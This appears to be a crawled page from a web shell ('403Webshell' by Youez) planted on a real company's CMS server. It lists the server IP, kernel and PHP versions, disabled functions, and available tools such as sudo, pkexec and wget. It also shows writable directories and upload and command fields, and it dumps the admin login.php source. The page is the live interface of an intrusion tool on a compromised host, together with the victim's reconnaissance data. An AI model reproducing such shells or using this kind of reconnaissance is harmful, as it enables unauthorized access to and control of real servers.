403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/hkosl.com/innoutstorage/webadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/hkosl.com/innoutstorage/webadmin/login.php
<?php
	require_once 'config.php';

	// Is the user already logged in? Redirect him/her to the private page

	if (isSet($_SESSION['loginname']) && ($loggin == '1')) {
		header("Location: index.php");
		exit;
	}

	require_once 'function_login_block.php';
	die_if_login_block();

	if (isSet($_POST['submit'])) {
		$do_login = true;

		require_once 'do_login.php';
	}

?>
<!DOCTYPE html>
<html>
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
	<title>Content Management System (CMS) - Powered by One Solution Limited</title>
	<style type="text/css">
		<!--
		body {
			padding: 0px;
			margin-top: 50px;
			background-color: #666666;
			font-family: Arial;
			font-size: 12px;
			color: #666666;
			text-decoration: none;
		}

		#error_notification {
			border: 1px #A25965 solid;
			height: auto;
			padding: 4px;
			background: #F8F0F1;
			text-align: center;
			-moz-border-radius: 5px;
		}

		-->
	</style>
</head>

<body>
<table width="500" border="0" align="center" cellpadding="0" cellspacing="0">
	<tr>
		<td bgcolor="#FFFFFF"><img src="images/login_topf.jpg" width="500" height="15"/></td>
	</tr>
	<tr>
		<td align="center" valign="middle" bgcolor="#FFFFFF"><img src="images/logo.png" /></td>
	</tr>
	<tr>
		<td bgcolor="#FFFFFF"><img src="images/login_line.jpg" width="500" height="15"/></td>
	</tr>
	<tr>
		<td align="center" valign="middle" bgcolor="#FFFFFF">
			<?php
				if (isSet($login_error)) {
					echo '<div id="error_notification">登入資料不相符,請重新輸入。</div>';
				}
			?>
			<form name="login" method="post" action="login.php">
				<table border="0" cellspacing="0" cellpadding="3">
					<tr>
						<td align="right">登入名稱</td>
						<td align="left">:&nbsp;</td>
						<td align="left"><input id="name" type="text" name="loginname" style="width:200px;"></td>
					</tr>
					<tr>
						<td align="right">登入密碼</td>
						<td align="left">:&nbsp;</td>
						<td align="left"><input type="password" name="password" style="width:200px;"></td>
					</tr>

					<tr>
						<td colspan="2" align="center"></td>
						<td colspan="2" align="left"><input id="submit" type="submit" name="submit" value=" 提交 ">
						</td>
					</tr>
				</table>
			</form>
		</td>
	</tr>
	<tr>
		<td bgcolor="#FFFFFF"><img src="images/login_line.jpg" width="500" height="15"/></td>
	</tr>
	<tr>
		<td align="right" bgcolor="#FFFFFF">&nbsp;</td>
	</tr>
	<tr>
		<td><img src="images/login_footerf.jpg" width="500" height="15"/></td>
	</tr>
</table>
</body>
</html>


Youez - 2016 - github.com/yon3zu
LinuXploit